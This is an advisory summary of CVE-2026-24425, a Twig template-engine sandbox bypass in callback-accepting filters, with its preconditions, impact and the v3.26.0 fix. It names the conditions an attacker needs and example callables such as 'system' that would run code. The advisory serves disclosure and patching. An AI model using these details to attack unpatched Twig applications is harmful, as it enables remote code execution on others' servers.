CVE-2026-24425

Vulnerability

Twig versions 2.16.x and 3.9.0 through 3.25.x contain a sandbox bypass vulnerability affecting the sort, filter, map, and reduce filters. When the sandbox is enabled through a SourcePolicyInterface rather than globally, the runtime check that rejects non-Closure callables does not use the current template Source, allowing user-controlled templates to pass arbitrary PHP callables [1], [2]. The bug exists because the sandbox enforcement is not source-aware in these callback-accepting filters [2].

Exploitation

An attacker with template rendering capabilities must meet all four conditions: (1) sandbox is not enabled globally, (2) a SourcePolicyInterface enables the sandbox for the rendered template, (3) the template uses one of the affected filters, and (4) the callback is not a Closure. Under these conditions, the runtime check incorrectly treats the execution as non-sandboxed, allowing the attacker to supply arbitrary callables such as 'system' or ['Shell', 'exec'] [2].

Impact

Successful exploitation allows an attacker to execute arbitrary PHP code in the context of the application. This leads to full compromise of confidentiality, integrity, and availability — including data disclosure, file manipulation, and remote code execution [2], [3].

Mitigation

The fix was released in Twig v3.26.0 on 2026-05-20, which propagates the current template Source to callback-accepting filters and uses it when deciding whether sandbox restrictions apply [1], [2]. Users should upgrade to 3.26.0 or later. For versions 2.16.x, no patch is explicitly mentioned; users should upgrade to the 3.x branch or apply compatibility changes. No workaround is documented [2].